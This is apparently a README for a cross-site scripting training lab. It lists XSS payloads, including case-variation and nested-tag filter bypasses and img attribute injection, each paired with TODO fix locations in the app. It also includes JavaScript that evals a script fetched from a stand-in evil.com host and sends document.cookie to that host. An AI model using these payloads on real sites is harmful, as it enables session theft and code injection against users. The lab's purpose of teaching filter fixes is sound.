# 01_XSS

## Payloads

### Basic

``` html
<script>alert("XSS")</script>
```

Fix :

    - TODO 1 : server.ts
    - TODO 2 : middleware.ts

### Let's try uppercase

``` html
<SCRIPT>alert("XSS")</SCRIPT>
```

Fix:

    - TODO 3 : middleware.ts

### Now only with first letter

``` html
<Script>alert("XSS")</Script>
```

Fix:

    - TODO 4 : midleware.ts

### Sometimes you can have the ability to inject img url like this

``` html
<img src="[MY_VARIABLE]" />
```

This payload

``` html
SOME_IMG_URL" onload="alert("XSS")
```

Can transform img into this

``` html
<img src="SOME_IMG_URL" onload="alert("XSS")" />
```

Adding an img url to be sure it load can be painful

``` html
" onmmouseover="alert("XSS")
```

``` html
" onclick="alert("XSS")
```

If you can execute a basic alert, you can execute almost everything.

You can fetch some script from your server

``` javascript
    fetch('https://yourserver.evil.com/evil/js')
        .then(res => res.text())
        .then(eval)
```

You can send cookie with POST request to exfiltrate data

``` javascript
    fetch("https://yourserver.evil.com/", 
    {
        method: "post",
        body: JSON.stringify(document.cookie)
    })
```

If use of fetch or POST request is not possible, you can create an image with a malicious url

``` javascript
document.write('<img src="https://yourserver.evil.com/cool-img.jpg?cookie=' 
    + document.cookie +
     '" />')
```

FIX :

    - TODO 5 : views/index.ejs

### And one more tricky

``` html
<scSCRIPTript>alert("XSS")</scSCRIPTript>
```

Fix (for the last one and the whole app) :

    - TODO 6 : views/index.ejs
